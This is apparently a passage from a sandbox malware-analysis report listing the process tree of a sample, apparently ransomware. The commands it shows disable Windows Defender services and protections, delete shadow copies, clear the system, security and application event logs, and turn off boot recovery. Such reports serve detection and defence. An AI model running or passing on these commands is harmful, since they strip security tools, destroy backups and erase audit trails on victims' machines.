C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:3040
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1492
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:4472
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2884 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2952 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:4780 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:832
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2472
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3936
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3204
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:3044 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2164
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:5056 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2832 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4176 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4296 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4212 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4324 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:424 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:3252 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3112
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1904 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:648
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:640 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2708
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2700
Network
MITRE ATT&CK Enterprise v6